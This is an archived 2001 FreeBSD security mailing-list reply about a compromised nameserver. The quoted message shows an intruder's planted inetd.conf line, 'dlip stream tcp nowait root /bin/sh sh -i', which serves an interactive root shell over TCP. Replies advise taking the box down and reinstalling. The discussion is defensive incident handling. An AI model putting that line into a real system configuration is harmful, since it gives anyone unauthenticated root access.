From owner-freebsd-security  Thu Nov  1  6:58:32 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by hub.freebsd.org (Postfix) with ESMTP id A331B37B407
	for <freebsd-security@freebsd.org>; Thu,  1 Nov 2001 06:58:25 -0800 (PST)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
	by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id fA1EwNW86798;
	Thu, 1 Nov 2001 09:58:23 -0500 (EST)
Date: Thu, 1 Nov 2001 09:58:23 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: "G.P. de Boer" <g.p.de.boer@st.hanze.nl>
Cc: <freebsd-security@freebsd.org>
Subject: Re: strange inetd.conf entry
In-Reply-To: <5.1.0.14.0.20011101154627.01f2e3f0@thedarkside.nl>
Message-ID: <20011101095342.I79615-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> >I have that sinking feeling. I discovered this line at the end of
> >inetd.conf on one of our servers:
> >
> >dlip        stream  tcp     nowait  root    /bin/sh sh -i
> >
> Take the box down, do a reinstall and don't run known exploitable
> daemons. The shell acquired using the above line is useable. [snip]
>
> Hope the box wasn't really doing anything important, because it's rooted
> for sure.

Thanks for the info, GP. I wonder how they got in to begin with. In any
event, it was only doing nameservice and had no sensitive files. We are
reloading it today.	- Ralph



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message